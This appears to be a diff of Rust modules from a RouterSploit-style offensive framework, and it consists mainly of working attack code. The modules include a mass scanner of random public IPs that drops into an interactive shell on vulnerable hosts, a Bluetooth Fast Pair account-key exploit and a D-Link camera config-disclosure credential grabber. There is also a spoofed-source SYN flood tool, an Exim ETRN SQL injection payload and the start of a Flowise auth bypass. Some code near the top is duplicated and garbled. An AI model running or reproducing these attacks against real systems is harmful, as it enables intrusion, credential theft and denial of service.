.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
// Handle either single IP or file of targets
let targets = if Path::new(target).exists() {
println!("{}", format!("[*] Loading targets from file: {}", target).cyan());
tokio::fs::read_to_string(target)
.await?
.lines()
.map(str::to_string)
.filter(|s| !s.trim().is_empty())
.collect::<Vec<_>>()
} else {
vec![target.to_string()]
};
println!("{}", format!("[*] Testing {} target(s)...", targets.len()).cyan());
println!();
for raw_ip in &targets {
let url = normalize_url(raw_ip, &port);
println!("{}", format!("[*] Testing: {}", url).yellow());
if check_vuln(&client, &url).await? {
println!("{}", format!("[+] {} is VULNERABLE!", url).green().bold());
interactive_shell(&client, &url).await?;
} else {
println!("{}", format!("[-] {} is not vulnerable", url).red());
let client = Arc::new(client);
let semaphore = Arc::new(Semaphore::new(MASS_SCAN_CONCURRENCY));
let checked = Arc::new(AtomicUsize::new(0));
let found = Arc::new(AtomicUsize::new(0));
let c = checked.clone();
let f = found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(10)).await;
println!("[*] Checked: {} | Found: {}", c.load(Ordering::Relaxed), f.load(Ordering::Relaxed));
}
println!();
});
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let cl = client.clone();
let chk = checked.clone();
let fnd = found.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
let ip_str = ip.to_string();
if quick_check(&cl, &ip_str).await {
println!("{}", format!("[+] VULNERABLE: {}", ip_str).green().bold());
fnd.fetch_add(1, Ordering::Relaxed);
}
chk.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
}
/// Entry point required for RouterSploit-inspired dispatch system
pub async fn run(target: &str) -> Result<()> {
if target == "0.0.0.0" || target == "0.0.0.0/0" || target.is_empty() || target == "random" {
run_mass_scan().await
} else {
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
let port = prompt_port()?;
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
// Handle either single IP or file of targets
let targets = if Path::new(target).exists() {
println!("{}", format!("[*] Loading targets from file: {}", target).cyan());
tokio::fs::read_to_string(target)
.await?
.lines()
.map(str::to_string)
.filter(|s| !s.trim().is_empty())
.collect::<Vec<_>>()
} else {
vec![target.to_string()]
};
println!("{}", format!("[*] Testing {} target(s)...", targets.len()).cyan());
println!();
for raw_ip in &targets {
let url = normalize_url(raw_ip, &port);
println!("{}", format!("[*] Testing: {}", url).yellow());
if check_vuln(&client, &url).await? {
println!("{}", format!("[+] {} is VULNERABLE!", url).green().bold());
interactive_shell(&client, &url).await?;
} else {
println!("{}", format!("[-] {} is not vulnerable", url).red());
}
println!();
}
println!("{}", "[*] Scan complete.".cyan());
Ok(())
}
println!("{}", "[*] Scan complete.".cyan());
Ok(())
}
+1
View File
@@ -0,0 +1 @@
pub mod wpair;
+232
View File
@@ -0,0 +1,232 @@
use anyhow::{anyhow, Result};
use btleplug::api::{Central, Manager as _, Peripheral as _, ScanFilter, WriteType};
use btleplug::platform::{Adapter, Manager, Peripheral};
use colored::*;
use rand::Rng;
use std::time::Duration;
use tokio::time;
use uuid::Uuid;
use aes::Aes128;
use cipher::{BlockEncrypt, KeyInit};
use cipher::generic_array::GenericArray;
// Fast Pair Service and Characteristics
const SERVICE_UUID: Uuid = Uuid::from_u128(0x0000fe2c_0000_1000_8000_00805f9b34fb);
const MODEL_ID_UUID: Uuid = Uuid::from_u128(0xfe2c1233_8366_4814_8eb0_01de32100bea);
const KEY_BASED_PAIRING_UUID: Uuid = Uuid::from_u128(0xfe2c1234_8366_4814_8eb0_01de32100bea);
const PASSKEY_UUID: Uuid = Uuid::from_u128(0xfe2c1235_8366_4814_8eb0_01de32100bea);
const ACCOUNT_KEY_UUID: Uuid = Uuid::from_u128(0xfe2c1236_8366_4814_8eb0_01de32100bea);
// Message types
const MSG_KEY_BASED_PAIRING_REQUEST: u8 = 0x00;
#[derive(Clone, Copy, Debug)]
enum ExploitStrategy {
RawKbp,
RawWithSeeker,
Retroactive,
ExtendedResponse,
}
pub async fn run(_target: &str) -> Result<()> {
println!("{}", "=== Fast Pair (WPAir) Exploit ===".cyan().bold());
println!("{}", "Exploits CVE-2025-36911 (Fast Pair 'Magic')".yellow());
// Initialize manager
let manager = Manager::new().await?;
let adapters = manager.adapters().await?;
let adapter = adapters.into_iter().next().ok_or_else(|| anyhow!("No Bluetooth adapters found"))?;
// Scan
let target_peripheral = scan_for_target(&adapter, 5).await?;
// Connect
println!("Connecting to {}...", target_peripheral.address());
target_peripheral.connect().await?;
target_peripheral.discover_services().await?;
let strategies = [
ExploitStrategy::RawKbp,
ExploitStrategy::RawWithSeeker,
ExploitStrategy::Retroactive,
ExploitStrategy::ExtendedResponse
];
// Seeker address (our address) - hardcoded dummy
let seeker_address = vec![0x11, 0x22, 0x33, 0x44, 0x55, 0x66];
for strategy in strategies {
if execute_strategy(&target_peripheral, strategy, &seeker_address).await? {
break;
}
time::sleep(Duration::from_millis(500)).await;
}
let _ = target_peripheral.disconnect().await;
Ok(())
}
async fn scan_for_target(adapter: &Adapter, duration_secs: u64) -> Result<Peripheral> {
println!("{}", "Starting BLE scan for Fast Pair devices...".blue());
let filter = ScanFilter {
services: vec![SERVICE_UUID],
};
adapter.start_scan(filter).await?;
time::sleep(Duration::from_secs(duration_secs)).await;
let peripherals = adapter.peripherals().await?;
if peripherals.is_empty() {
return Err(anyhow!("No Fast Pair devices found"));
}
println!("{}", "\nFound devices:".green().bold());
let mut valid_peripherals = Vec::new();
for (idx, p) in peripherals.iter().enumerate() {
let properties = p.properties().await?;
if let Some(props) = properties {
let name = props.local_name.unwrap_or_else(|| "Unknown".to_string());
let address = p.address();
println!("{}: {} ({})", idx, name, address);
valid_peripherals.push(p.clone());
}
}
if valid_peripherals.is_empty() {
return Err(anyhow!("No reachable devices found after scan"));
}
// Defaulting to first device for automation in this port
println!("{}", "Selecting first device automatically...".yellow());
Ok(valid_peripherals[0].clone())
}
fn aes_encrypt(key: &[u8], data: &[u8]) -> Vec<u8> {
let key = GenericArray::from_slice(&key[0..16]);
let mut block = GenericArray::clone_from_slice(&data[0..16]);
let cipher = Aes128::new(key);
cipher.encrypt_block(&mut block);
block.to_vec()
}
fn build_kbp_request(strategy: ExploitStrategy, address_bytes: &[u8], seeker_address_bytes: &[u8]) -> (Vec<u8>, Vec<u8>) {
let mut request = vec![0u8; 16];
let mut shared_secret = vec![0u8; 16];
let mut rng = rand::rng();
match strategy {
ExploitStrategy::RawKbp => {
let salt: [u8; 8] = rng.random();
request[0] = MSG_KEY_BASED_PAIRING_REQUEST;
request[1] = 0x11;
request[2..8].copy_from_slice(&address_bytes[0..6]);
request[8..16].copy_from_slice(&salt);
shared_secret[0..8].copy_from_slice(&salt);
},
ExploitStrategy::RawWithSeeker => {
let salt: [u8; 2] = rng.random();
request[0] = MSG_KEY_BASED_PAIRING_REQUEST;
request[1] = 0x02;
request[2..8].copy_from_slice(&address_bytes[0..6]);
request[8..14].copy_from_slice(&seeker_address_bytes[0..6]);
request[14..16].copy_from_slice(&salt);
let random_secret: [u8; 16] = rng.random();
shared_secret.copy_from_slice(&random_secret);
},
ExploitStrategy::Retroactive => {
let salt: [u8; 2] = rng.random();
request[0] = MSG_KEY_BASED_PAIRING_REQUEST;
request[1] = 0x0A;
request[2..8].copy_from_slice(&address_bytes[0..6]);
request[8..14].copy_from_slice(&seeker_address_bytes[0..6]);
request[14..16].copy_from_slice(&salt);
let random_secret: [u8; 16] = rng.random();
shared_secret.copy_from_slice(&random_secret);
},
ExploitStrategy::ExtendedResponse => {
let salt: [u8; 8] = rng.random();
request[0] = MSG_KEY_BASED_PAIRING_REQUEST;
request[1] = 0x10;
request[2..8].copy_from_slice(&address_bytes[0..6]);
request[8..16].copy_from_slice(&salt);
shared_secret[0..8].copy_from_slice(&salt);
}
}
(request, shared_secret)
}
async fn execute_strategy(peripheral: &Peripheral, strategy: ExploitStrategy, seeker_address: &[u8]) -> Result<bool> {
let address = peripheral.address();
let address_str = address.to_string();
let address_bytes = mac_to_bytes(&address_str)?;
let (request, shared_secret) = build_kbp_request(strategy, &address_bytes, seeker_address);
println!("{}: {:?}", "Trying strategy".blue(), strategy);
let chars = peripheral.characteristics();
// Read Model ID to verify Fast Pair device
if let Some(model_char) = chars.iter().find(|c| c.uuid == MODEL_ID_UUID) {
println!("Found Model ID characteristic, reading...");
if let Ok(model_data) = peripheral.read(model_char).await {
println!("Model ID: {:02x?}", model_data);
}
}
let kbp_char = chars.iter().find(|c| c.uuid == KEY_BASED_PAIRING_UUID).ok_or(anyhow!("KBP Char not found"))?;
println!("Writing KBP request...");
if let Err(e) = peripheral.write(kbp_char, &request, WriteType::WithoutResponse).await {
println!("Write failed: {}", e);
return Ok(false);
}
time::sleep(Duration::from_millis(500)).await;
// Check for Passkey characteristic (used in some Fast Pair flows)
if let Some(passkey_char) = chars.iter().find(|c| c.uuid == PASSKEY_UUID) {
println!("Found Passkey characteristic, attempting passkey bypass...");
// Send encrypted passkey response (0x02 = passkey seeker response)
let mut passkey_block = vec![0u8; 16];
passkey_block[0] = 0x02; // Passkey seeker message type
let encrypted_passkey = aes_encrypt(&shared_secret, &passkey_block);
let _ = peripheral.write(passkey_char, &encrypted_passkey, WriteType::WithoutResponse).await;
}
println!("Attempting to write Account Key...");
let account_key_char = chars.iter().find(|c| c.uuid == ACCOUNT_KEY_UUID);
if let Some(ak_char) = account_key_char {
let mut account_key = vec![0u8; 16];
account_key[0] = 0x04;
let mut rng = rand::rng();
rng.fill(&mut account_key[1..]);
let encrypted_ak = aes_encrypt(&shared_secret, &account_key);
if let Ok(_) = peripheral.write(ak_char, &encrypted_ak, WriteType::WithResponse).await {
println!("{}", "Account Key Written Successfully! Device Exploited!".green().bold());
return Ok(true);
}
}
Ok(false)
}
fn mac_to_bytes(mac: &str) -> Result<Vec<u8>> {
let bytes: Vec<u8> = mac.split(':')
.map(|s| u8::from_str_radix(s, 16))
.collect::<Result<Vec<_>, _>>()?;
if bytes.len() != 6 {
return Err(anyhow!("Invalid MAC address length"));
}
Ok(bytes)
}
@@ -0,0 +1,174 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target};
use regex::Regex;
/// D-Link DCS Cameras Authentication Bypass
///
/// 1:1 Port from Routersploit (dlink_dcs_930l_auth_bypass.py)
/// Targets DCS-930L (v1.04) and DCS-932L (v1.02)
/// Vulnerability: Unauthenticated configuration disclosure via /frame/GetConfig
/// Logic: Retrieve obfuscated config, deobfuscate with bitwise ops, extract credentials.
pub async fn run(target: &str) -> Result<()> {
print_banner();
// Determine target URL
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// Module default port is 8080 in python, but let's assume standard normalization handles ports?
// Utils `normalize_target` handles port logic if integrated, otherwise defaults to 80/443 logic usually?
// User might need to specify port in target IP (e.g. 1.2.3.4:8080).
// Let's assume user provides correct target string.
let base_url = if target_ip.contains(':') {
format!("http://{}", target_ip)
} else {
// Default to port 8080 as per python module suggestion?
// Or just standard http. Routersploit default is 8080 for this module.
// Let's print a hint.
println!("{} Note: Default target port for this device is often 8080. If it fails, try target as IP:8080", "[*]".blue());
format!("http://{}:8080", target_ip)
};
println!("{} Target: {}", "[*]".blue(), base_url);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(10))
.build()?;
let url = format!("{}/frame/GetConfig", base_url);
println!("{} Retrieving configuration...", "[*]".blue());
let res = client.get(&url)
.send()
.await
.context("Failed to retrieve config")?;
if res.status().is_success() {
let bytes = res.bytes().await?;
if bytes.is_empty() {
println!("{} Empty response received.", "[-]".red());
return Ok(());
}
println!("{} Response received ({} bytes). Deobfuscating...", "[*]".blue(), bytes.len());
match deobfuscate(&bytes) {
Some(config_str) => {
// Check for AdminID/Password
let mut found_creds = false;
// Regex from python: r"AdminID=(.*)" and r"AdminPassword=(.*)"
// Note: Rust regex doesn't support case insensitive flag inline (?i) easily at start if using simple search
// but we can compile with Builder.
let re_id = Regex::new(r"(?i)AdminID=(.*)")?;
let re_pass = Regex::new(r"(?i)AdminPassword=(.*)")?;
if let Some(caps) = re_id.captures(&config_str) {
if let Some(val) = caps.get(1) {
println!("{} Found Admin ID: {}", "[+]".green(), val.as_str().trim());
found_creds = true;
}
}
if let Some(caps) = re_pass.captures(&config_str) {
if let Some(val) = caps.get(1) {
println!("{} Found Admin Password: {}", "[+]".green(), val.as_str().trim());
found_creds = true;
}
}
if !found_creds {
println!("{} Config retrieved but no credentials found.", "[*]".yellow());
println!("{} Partial content:\n{}", "[*]".yellow(), &config_str.chars().take(200).collect::<String>());
}
},
None => {
println!("{} Deobfuscation failed (length mismatch or invalid format).", "[-]".red());
}
}
} else {
println!("{} Request failed with status: {}", "[-]".red(), res.status());
}
Ok(())
}
fn deobfuscate(config: &[u8]) -> Option<String> {
// Port of `_deobfuscate` from Routersploit
// Step 1: arr_c = [chain(...) for t in config]
// Python chain:
// lambda d: (d + ord('y')) & 0xff
// lambda d: (d ^ ord('Z')) & 0xff
// lambda d: (d - ord('e')) & 0xff
let mut arr_c: Vec<u8> = config.iter().map(|&d| {
let mut val = d;
val = val.wrapping_add(b'y');
val = val ^ b'Z';
val = val.wrapping_sub(b'e');
val
}).collect();
let arr_c_len = arr_c.len();
if arr_c_len == 0 { return None; }
// tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff
let tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff;
// Step 2: Reverse transformation
// Python loop: for t in reversed(range(arr_c_len)):
for t in (0..arr_c_len).rev() {
let ct = if t == 0 {
// ct = chain([lambda d: (d >> 3) & 0xff, lambda d: (d + tmp) & 0xff], arr_c[t])
let val = arr_c[t];
let v1 = (val >> 3) & 0xff;
let v2 = v1.wrapping_add(tmp);
v2
} else {
// ct = (((arr_c[t] >> 3) & 0xff) + (((arr_c[t - 1] & 0x7) << 5) & 0xff)) & 0xff
let part1 = (arr_c[t] >> 3) & 0xff;
let part2 = ((arr_c[t-1] & 0x7) << 5) & 0xff;
(part1.wrapping_add(part2)) & 0xff
};
arr_c[t] = ct;
}
// Step 3: String manipulation (Interleave)
// Python: tmp_str = "".join(map(chr, arr_c)) ...
// Note: Config might contain non-utf8 chars initially?
// Usually config is ascii. Let's assume safe to treat as chars/bytes 1:1.
if arr_c_len % 2 != 0 {
return None;
}
let half_len = arr_c_len / 2;
let mut ret_bytes = Vec::with_capacity(arr_c_len);
// Python loop:
// for i in range(half_str_len):
// ret_str += tmp_str[i + half_str_len] + tmp_str[i]
for i in 0..half_len {
ret_bytes.push(arr_c[i + half_len]);
ret_bytes.push(arr_c[i]);
}
// Convert to String (lossy if needed)
Some(String::from_utf8_lossy(&ret_bytes).to_string())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ D-Link DCS-930L Auth Bypass (Config Disclosure) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
+1
View File
@@ -0,0 +1 @@
pub mod dlink_dcs_930l_auth_bypass;
+1
View File
@@ -0,0 +1 @@
pub mod null_syn_exhaustion;
@@ -0,0 +1,393 @@
//! Null SYN Exhaustion Testing Module
//!
//! Opens concurrent SYN connections sending null-byte streams for resource exhaustion testing.
//! FOR AUTHORIZED TESTING ONLY.
use anyhow::{anyhow, Context, Result};
use colored::*;
use pnet_packet::ip::IpNextHeaderProtocols;
use pnet_packet::ipv4::{self, MutableIpv4Packet};
use pnet_packet::tcp::{self, MutableTcpPacket, TcpFlags};
use rand::Rng;
use socket2::{Domain, Protocol, Socket, Type};
use std::net::{IpAddr, Ipv4Addr, SocketAddr};
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::Arc;
use std::time::Duration;
use tokio::sync::Semaphore;
use tokio::time::Instant;
use crate::utils::{
normalize_target, prompt_default, prompt_port, prompt_required, prompt_yes_no,
};
/// Configuration for the exhaustion test
#[derive(Clone, Debug)]
struct ExhaustionConfig {
target_ip: Ipv4Addr,
target_port: u16,
source_port: Option<u16>,
use_random_source_ip: bool,
concurrent_streams: usize,
duration_secs: u64,
interval_mode: IntervalMode,
payload_size: usize,
}
#[derive(Clone, Debug)]
enum IntervalMode {
Zero, // Max speed, no delay
Delay(u64), // Delay in milliseconds
}
/// Entry point for the module
pub async fn run(initial_target: &str) -> Result<()> {
display_banner();
let config = gather_config(initial_target).await?;
execute_exhaustion(&config).await
}
fn display_banner() {
println!("{}", r#"
╔══════════════════════════════════════════════════════════════╗
║ Null SYN Exhaustion Testing Module ║
║ FOR AUTHORIZED TESTING ONLY ║
╚══════════════════════════════════════════════════════════════╝
"#.red().bold());
}
async fn gather_config(initial_target: &str) -> Result<ExhaustionConfig> {
println!("{}", "=== Configuration ===".bold());
// Target IP
let target_input = if initial_target.trim().is_empty() {
prompt_required("Target IP")?
} else {
println!("{}", format!("[*] Using target: {}", initial_target).cyan());
initial_target.to_string()
};
let normalized = normalize_target(&target_input)?;
let target_ip: Ipv4Addr = normalized.parse()
.map_err(|_| anyhow!("Target must be a valid IPv4 address (IPv6 not supported for raw packets)"))?;
// Target Port
let target_port = prompt_port("Target port", 80)?;
// Source Port (optional)
let src_port_input = prompt_default("Source port (blank for random)", "")?;
let source_port = if src_port_input.is_empty() {
None
} else {
Some(src_port_input.parse::<u16>()
.map_err(|_| anyhow!("Invalid source port"))?)
};
// Random Source IP
let use_random_source_ip = prompt_yes_no("Use random (spoofed) source IPs? (requires root)", false)?;
// Concurrent Streams
let streams_input = prompt_default("Number of concurrent streams", "100")?;
let concurrent_streams: usize = streams_input.parse()
.map_err(|_| anyhow!("Invalid number"))?;
if concurrent_streams == 0 {
return Err(anyhow!("Concurrent streams must be > 0"));
}
// Duration
let duration_input = prompt_required("Test duration (seconds)")?;
let duration_secs: u64 = duration_input.parse()
.map_err(|_| anyhow!("Invalid duration"))?;
if duration_secs == 0 {
return Err(anyhow!("Duration must be > 0"));
}
// Interval Mode
let zero_interval = prompt_yes_no("Use zero interval (max speed)?", true)?;
let interval_mode = if zero_interval {
IntervalMode::Zero
} else {
let delay_input = prompt_default("Delay between packets (ms)", "10")?;
let delay: u64 = delay_input.parse().map_err(|_| anyhow!("Invalid delay"))?;
IntervalMode::Delay(delay)
};
// Payload Size
let payload_input = prompt_default("Null-byte payload size", "1024")?;
let payload_size: usize = payload_input.parse()
.map_err(|_| anyhow!("Invalid payload size"))?;
// Summary
println!("\n{}", "=== Test Configuration ===".bold());
println!(" Target: {}:{}", target_ip, target_port);
println!(" Source Port: {}", source_port.map(|p| p.to_string()).unwrap_or_else(|| "random".to_string()));
println!(" Random Source IP: {}", if use_random_source_ip { "yes" } else { "no" });
println!(" Concurrent Streams: {}", concurrent_streams);
println!(" Duration: {}s", duration_secs);
println!(" Interval: {:?}", interval_mode);
println!(" Payload Size: {} bytes", payload_size);
if !prompt_yes_no("\nProceed with test?", true)? {
return Err(anyhow!("Test cancelled by user"));
}
Ok(ExhaustionConfig {
target_ip,
target_port,
source_port,
use_random_source_ip,
concurrent_streams,
duration_secs,
interval_mode,
payload_size,
})
}
async fn execute_exhaustion(config: &ExhaustionConfig) -> Result<()> {
println!("\n{}", "[*] Starting Null SYN Exhaustion test...".yellow().bold());
let stop_flag = Arc::new(AtomicBool::new(false));
let packets_sent = Arc::new(AtomicU64::new(0));
let bytes_sent = Arc::new(AtomicU64::new(0));
// Resource-efficient: limit concurrent workers with semaphore
// Use a reasonable limit to avoid FD exhaustion
let max_concurrent = config.concurrent_streams.min(500);
let semaphore = Arc::new(Semaphore::new(max_concurrent));
let start_time = Instant::now();
let duration = Duration::from_secs(config.duration_secs);
// Spawn stats printer
let stats_stop = stop_flag.clone();
let stats_packets = packets_sent.clone();
let stats_bytes = bytes_sent.clone();
let stats_handle = tokio::spawn(async move {
while !stats_stop.load(Ordering::Relaxed) {
tokio::time::sleep(Duration::from_secs(1)).await;
let pkts = stats_packets.load(Ordering::Relaxed);
let bytes = stats_bytes.load(Ordering::Relaxed);
print!("\r{}", format!(
"[*] Packets: {} | Bytes: {} KB | Rate: {:.1} pkt/s",
pkts,
bytes / 1024,
pkts as f64 / start_time.elapsed().as_secs_f64()
).dimmed());
let _ = std::io::Write::flush(&mut std::io::stdout());
}
});
// Spawn worker streams
let mut handles = Vec::new();
for stream_id in 0..config.concurrent_streams {
let config = config.clone();
let sem = semaphore.clone();
let stop = stop_flag.clone();
let pkts = packets_sent.clone();
let bts = bytes_sent.clone();
let handle = tokio::spawn(async move {
// Acquire permit (blocks if too many concurrent)
let _permit = match sem.acquire().await {
Ok(p) => p,
Err(_) => return,
};
if let Err(e) = run_stream(stream_id, &config, stop, pkts, bts, start_time, duration).await {
// Silently continue on errors (permission denied, etc.)
if e.to_string().contains("Permission denied") || e.to_string().contains("EPERM") {
eprintln!("\n{}", "[!] Root privileges required for raw sockets. Run with sudo.".red().bold());
}
}
});
handles.push(handle);
}
// Wait for duration
tokio::time::sleep(duration).await;
// Signal stop
stop_flag.store(true, Ordering::Relaxed);
// Wait for workers
for handle in handles {
let _ = handle.await;
}
stats_handle.abort();
// Final stats
let total_pkts = packets_sent.load(Ordering::Relaxed);
let total_bytes = bytes_sent.load(Ordering::Relaxed);
let elapsed = start_time.elapsed();
println!("\n\n{}", "=== Test Complete ===".green().bold());
println!(" Duration: {:.2}s", elapsed.as_secs_f64());
println!(" Total Packets: {}", total_pkts);
println!(" Total Data: {} KB", total_bytes / 1024);
println!(" Avg Rate: {:.1} pkt/s", total_pkts as f64 / elapsed.as_secs_f64());
Ok(())
}
async fn run_stream(
_stream_id: usize,
config: &ExhaustionConfig,
stop: Arc<AtomicBool>,
packets: Arc<AtomicU64>,
bytes: Arc<AtomicU64>,
start: Instant,
duration: Duration,
) -> Result<()> {
// Create raw socket
let socket = Socket::new(
Domain::IPV4,
Type::RAW,
Some(Protocol::from(libc::IPPROTO_RAW)),
).context("Failed to create raw socket")?;
socket.set_header_included_v4(true)
.context("Failed to set IP_HDRINCL")?;
// Prepare null-byte payload
let null_payload = vec![0u8; config.payload_size];
while !stop.load(Ordering::Relaxed) && start.elapsed() < duration {
// Generate source IP
let src_ip = if config.use_random_source_ip {
generate_random_ipv4()
} else {
get_local_ipv4().unwrap_or_else(|| Ipv4Addr::new(127, 0, 0, 1))
};
// Generate source port
let src_port = config.source_port.unwrap_or_else(|| {
rand::rng().random_range(49152..=65535)
});
// Craft and send SYN packet with null payload
match send_syn_packet(&socket, src_ip, src_port, config.target_ip, config.target_port, &null_payload) {
Ok(sent) => {
packets.fetch_add(1, Ordering::Relaxed);
bytes.fetch_add(sent as u64, Ordering::Relaxed);
}
Err(_) => {
// Continue on errors
}
}
// Apply interval delay
match &config.interval_mode {
IntervalMode::Zero => {
// Yield to allow other tasks
tokio::task::yield_now().await;
}
IntervalMode::Delay(ms) => {
tokio::time::sleep(Duration::from_millis(*ms)).await;
}
}
}
Ok(())
}
fn send_syn_packet(
socket: &Socket,
src_ip: Ipv4Addr,
src_port: u16,
dst_ip: Ipv4Addr,
dst_port: u16,
payload: &[u8],
) -> Result<usize> {
// TCP header + payload
let tcp_header_len = 20;
let tcp_total_len = tcp_header_len + payload.len();
let mut tcp_buf = vec![0u8; tcp_total_len];
{
let mut tcp_pkt = MutableTcpPacket::new(&mut tcp_buf[..tcp_header_len])
.ok_or_else(|| anyhow!("Failed to create TCP packet"))?;
let seq_num: u32 = rand::rng().random();
tcp_pkt.set_source(src_port);
tcp_pkt.set_destination(dst_port);
tcp_pkt.set_sequence(seq_num);
tcp_pkt.set_acknowledgement(0);
tcp_pkt.set_data_offset(5);
tcp_pkt.set_flags(TcpFlags::SYN);
tcp_pkt.set_window(65535);
tcp_pkt.set_urgent_ptr(0);
// Checksum (without payload for header)
let tcp_immutable = tcp_pkt.to_immutable();
tcp_pkt.set_checksum(tcp::ipv4_checksum(&tcp_immutable, &src_ip, &dst_ip));
}
// Copy payload after TCP header
tcp_buf[tcp_header_len..].copy_from_slice(payload);
// IP header
const IPV4_HEADER_LEN: usize = 20;
let total_len = (IPV4_HEADER_LEN + tcp_total_len) as u16;
let mut ip_buf = vec![0u8; total_len as usize];
{
let mut ip_pkt = MutableIpv4Packet::new(&mut ip_buf)
.ok_or_else(|| anyhow!("Failed to create IP packet"))?;
let ip_id: u16 = rand::rng().random();
ip_pkt.set_version(4);
ip_pkt.set_header_length(5);
ip_pkt.set_total_length(total_len);
ip_pkt.set_identification(ip_id);
ip_pkt.set_ttl(64);
ip_pkt.set_next_level_protocol(IpNextHeaderProtocols::Tcp);
ip_pkt.set_source(src_ip);
ip_pkt.set_destination(dst_ip);
ip_pkt.set_flags(ipv4::Ipv4Flags::DontFragment);
ip_pkt.set_payload(&tcp_buf);
ip_pkt.set_checksum(ipv4::checksum(&ip_pkt.to_immutable()));
}
// Send
let dst_addr = SocketAddr::new(IpAddr::V4(dst_ip), 0);
let sent = socket.send_to(&ip_buf, &dst_addr.into())
.context("Failed to send packet")?;
Ok(sent)
}
fn generate_random_ipv4() -> Ipv4Addr {
let mut rng = rand::rng();
loop {
let a: u8 = rng.random_range(1..=254);
let b: u8 = rng.random();
let c: u8 = rng.random();
let d: u8 = rng.random_range(1..=254);
// Avoid private/reserved ranges
if a == 10 || a == 127 || (a == 172 && (16..=31).contains(&b)) || (a == 192 && b == 168) {
continue;
}
return Ipv4Addr::new(a, b, c, d);
}
}
fn get_local_ipv4() -> Option<Ipv4Addr> {
// Try to get local IP by connecting to a known address
use std::net::UdpSocket;
let socket = UdpSocket::bind("0.0.0.0:0").ok()?;
socket.connect("8.8.8.8:80").ok()?;
let addr = socket.local_addr().ok()?;
match addr.ip() {
IpAddr::V4(ip) => Some(ip),
_ => None,
}
}
@@ -0,0 +1,89 @@
use anyhow::{Result, Context};
use colored::*;
use tokio::net::TcpStream;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use std::time::Duration;
use tokio::time::Instant;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// Exim ETRN SQL Injection (CVE-2025-26794)
///
/// Time-based SQL injection in Exim's ETRN command when using SQLite backend.
/// Ported from PHP PoC.
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// User requested port selection. Default is 25.
let port_str = prompt_default("Target Port", "25")?;
let port: u16 = port_str.parse().context("Invalid port")?;
println!("{} Target: {}:{}", "[*]".blue(), target_ip, port);
// Test logic:
// 1. Normal Request: "ETRN #test" -> Measure Time
// 2. Delayed Request: "ETRN #',1); SELECT ... RANDOMBLOB(10000000) ..." -> Measure Time
// 3. Compare difference.
let normal_time = measure_response(&target_ip, port, "ETRN #test\r\n").await?;
println!("{} Normal Response Time: {:.3}s", "[*]".blue(), normal_time.as_secs_f64());
// SQLite Delay Payload from PoC
// SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000))))
// This payload causes CPU intensive operation, delaying response.
let delay_payload = "SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000))))";
let sqli_payload = format!("#',1); {} /*", delay_payload);
let malicious_command = format!("ETRN {}\r\n", sqli_payload);
println!("{} Sending time-based SQLi payload...", "[*]".blue());
let delayed_time = measure_response(&target_ip, port, &malicious_command).await?;
println!("{} Delayed Response Time: {:.3}s", "[*]".blue(), delayed_time.as_secs_f64());
let diff = delayed_time.as_secs_f64() - normal_time.as_secs_f64();
println!("{} Time Difference: {:.3}s", "[*]".blue(), diff);
// PoC uses 0.3s threshold
if diff > 0.3 {
println!("{} VULNERABLE to CVE-2025-26794 (Exim ETRN SQLi)!", "[+]".green().bold());
} else {
println!("{} Not vulnerable or target not using SQLite backend.", "[-]".red());
}
Ok(())
}
async fn measure_response(host: &str, port: u16, command: &str) -> Result<Duration> {
let addr = format!("{}:{}", host, port);
let mut stream = TcpStream::connect(&addr).await.context("Failed to connect")?;
// Read Banner
let mut buf = vec![0u8; 1024];
let _ = stream.read(&mut buf).await?;
// Send EHLO first (often required)
stream.write_all(b"EHLO test.com\r\n").await?;
let _ = stream.read(&mut buf).await?;
// Send Command
let start = Instant::now();
stream.write_all(command.as_bytes()).await.context("Failed to send command")?;
// Read Response
let _ = stream.read(&mut buf).await?;
let duration = start.elapsed();
Ok(duration)
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Exim ETRN Blind SQLi (CVE-2025-26794) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
+1
View File
@@ -0,0 +1 @@
pub mod exim_etrn_sqli_cve_2025_26794;
@@ -0,0 +1,50 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
/// Flowise 1.6.5 Authentication Bypass (CVE-2024-31621)
/// Unauthenticated access to /API/V1/credentials endpoint.
///
/// Credits:
/// - Discovered by DhiyaneshDK (Nuclei Template)
const DEFAULT_TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
display_banner();
// Normalize target
let url = if target.starts_with("http") { target.to_string() } else { format!("http://{}", target) };
let url = url.trim_end_matches('/').to_string();
println!("[*] Target: {}", url.cyan());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
